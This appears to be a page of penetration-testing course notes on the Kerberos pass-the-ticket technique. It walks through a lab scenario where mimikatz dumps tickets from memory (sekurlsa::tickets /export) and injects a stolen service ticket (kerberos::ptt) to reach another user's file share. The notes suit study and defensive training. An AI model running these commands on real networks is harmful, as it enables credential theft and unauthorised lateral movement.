Pass-the-Ticket

The goal is to steal a TGS and inject it in our session. TGT are limited to the machine they were created on but TGS can be exported anywhere on the network.

This requires administrator privileges unless the user we're stealing the TGS from is the same than the user in our session.

Scenario: Dave has access to a private share we can't access. We are under user Jen who has administrator privileges.

First we launch mimikatz and export the tickets:

> privilege::debug
> sekurlsa::tickets /export

We will probably have exported many tickets:

PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...

Continuing in mimikatz, we inject the tgs of our choice (here for smb access) to our session:

kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

We now have the TGS in our session. We can confirm:

klist

And we should now be able to access the share.

PreviousOverpass-the-Hash NextDCOM

Last updated 2 years ago